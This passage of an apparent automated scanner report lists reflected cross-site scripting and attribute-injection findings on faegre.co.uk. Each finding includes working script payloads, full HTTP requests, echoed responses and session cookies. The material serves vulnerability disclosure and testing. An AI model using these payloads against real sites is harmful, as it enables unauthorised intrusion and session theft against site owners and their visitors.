Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 16:56:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/emailpage.cfm?pageID=64&ba4dc"><a>a6169c51459=1" class="nyroModal" target="_blank">
...[SNIP]...

4.34. http://www.faegre.co.uk/11572 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /11572

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 35c7f'a%3d'b'953088322e8 was submitted in the REST URL parameter 1. This input was echoed as 35c7f'a='b'953088322e8 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /1157235c7f'a%3d'b'953088322e8 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/eventtypes
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ScreenWidth=1920; ScreenHeight=1200; __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.2.10.1303088795

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21795


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/1157235c7f'a='b'953088322e8&Language=1' class='printhide'>
...[SNIP]...

4.35. http://www.faegre.co.uk/11572 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /11572

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e60a4"><script>alert(1)</script>8aeed5db901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11572?e60a4"><script>alert(1)</script>8aeed5db901=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/eventtypes
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ScreenWidth=1920; ScreenHeight=1200; __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.2.10.1303088795

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 35630


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/11572?e60a4"><script>alert(1)</script>8aeed5db901=1"/>
...[SNIP]...

4.36. http://www.faegre.co.uk/59 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /59

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fff2'a%3d'b'92ec575172b was submitted in the REST URL parameter 1. This input was echoed as 8fff2'a='b'92ec575172b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /598fff2'a%3d'b'92ec575172b HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 18 Apr 2011 01:53:04 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21696


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/598fff2'a='b'92ec575172b&Language=1' class='printhide'>
...[SNIP]...

4.37. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /59

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88881'><script>alert(1)</script>0f8a8e3ba08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /59?88881'><script>alert(1)</script>0f8a8e3ba08=1 HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:52:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='http://www.faegre.co.uk/showlocation.aspx?show=59&88881'><script>alert(1)</script>0f8a8e3ba08=1&PrintPage=True'>
...[SNIP]...

4.38. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /59

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9fcc"><script>alert(1)</script>62920d69250 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /59?c9fcc"><script>alert(1)</script>62920d69250=1 HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:52:32 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38222


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/59?c9fcc"><script>alert(1)</script>62920d69250=1"/>
...[SNIP]...

4.39. http://www.faegre.co.uk/bios [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /bios

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 30595'a%3d'b'ddd78dd2b5a was submitted in the REST URL parameter 1. This input was echoed as 30595'a='b'ddd78dd2b5a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bios30595'a%3d'b'ddd78dd2b5a HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 18 Apr 2011 01:52:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21710


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/bios30595'a='b'ddd78dd2b5a&Language=1' class='printhide'>
...[SNIP]...

4.40. http://www.faegre.co.uk/bios [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /bios

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca48"><script>alert(1)</script>0c9a111c97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bios?1ca48"><script>alert(1)</script>0c9a111c97b=1 HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:52:09 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 70750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/bios?1ca48"><script>alert(1)</script>0c9a111c97b=1"/>
...[SNIP]...

4.41. http://www.faegre.co.uk/community [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /community

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abdd5'a%3d'b'a497da70a was submitted in the REST URL parameter 1. This input was echoed as abdd5'a='b'a497da70a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /communityabdd5'a%3d'b'a497da70a HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/eventtypes
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ScreenWidth=1920; ScreenHeight=1200; __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.2.10.1303088795

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:56 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/communityabdd5'a='b'a497da70a&Language=1' class='printhide'>
...[SNIP]...

4.42. http://www.faegre.co.uk/community [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdfed"><script>alert(1)</script>c2001057615 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community?fdfed"><script>alert(1)</script>c2001057615=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/eventtypes
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ScreenWidth=1920; ScreenHeight=1200; __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.2.10.1303088795

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 28539


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/community?fdfed"><script>alert(1)</script>c2001057615=1"/>
...[SNIP]...

4.43. http://www.faegre.co.uk/eventtypes [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /eventtypes

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b070f'a%3d'b'61e266f8c27 was submitted in the REST URL parameter 1. This input was echoed as b070f'a='b'61e266f8c27 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eventtypesb070f'a%3d'b'61e266f8c27 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/showlocation.aspx?Show=59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920; ScreenHeight=1200; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.1.10.1303088795

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/eventtypesb070f'a='b'61e266f8c27&Language=1' class='printhide'>
...[SNIP]...

4.44. http://www.faegre.co.uk/eventtypes [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /eventtypes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b46e6"><script>alert(1)</script>19517a7f7c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eventtypes?b46e6"><script>alert(1)</script>19517a7f7c3=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/showlocation.aspx?Show=59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920; ScreenHeight=1200; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.1.10.1303088795

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 25201


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/eventtypes?b46e6"><script>alert(1)</script>19517a7f7c3=1"/>
...[SNIP]...

4.45. http://www.faegre.co.uk/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7323a'a%3d'b'9d27131e28e was submitted in the REST URL parameter 1. This input was echoed as 7323a'a='b'9d27131e28e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico7323a'a%3d'b'9d27131e28e HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920; ScreenHeight=1200; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.1.10.1303088795

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:08:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21837


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/favicon.ico7323a'a='b'9d27131e28e&Language=1' class='printhide'>
...[SNIP]...

4.46. http://www.faegre.co.uk/getdoc.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /getdoc.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bebcd'a%3d'b'0454001b26b was submitted in the REST URL parameter 1. This input was echoed as bebcd'a='b'0454001b26b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /getdoc.aspxbebcd'a%3d'b'0454001b26b HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 18 Apr 2011 01:53:07 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/getdoc.aspxbebcd'a='b'0454001b26b&Language=1' class='printhide'>
...[SNIP]...

4.47. http://www.faegre.co.uk/index.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /index.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c16f9'a%3d'b'ba8a4d63c3b was submitted in the REST URL parameter 1. This input was echoed as c16f9'a='b'ba8a4d63c3b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.aspxc16f9'a%3d'b'ba8a4d63c3b HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:40 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=tyalqvn03txsucuhd3p4zp45; path=/
Cache-Control: private
Content-Length: 21830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/index.aspxc16f9'a='b'ba8a4d63c3b&Language=1' class='printhide'>
...[SNIP]...

4.48. http://www.faegre.co.uk/jscripts.js [REST URL parameter 1]

